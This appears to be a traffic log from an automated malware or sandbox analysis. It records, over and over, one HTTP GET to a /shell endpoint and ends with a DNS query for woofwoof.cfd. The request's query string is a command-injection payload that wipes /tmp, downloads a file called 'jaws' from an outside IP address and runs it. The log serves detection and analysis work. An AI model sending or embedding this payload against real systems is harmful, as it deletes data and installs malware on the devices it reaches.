              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficDNS traffic detected: DNS query: woofwoof.cfd
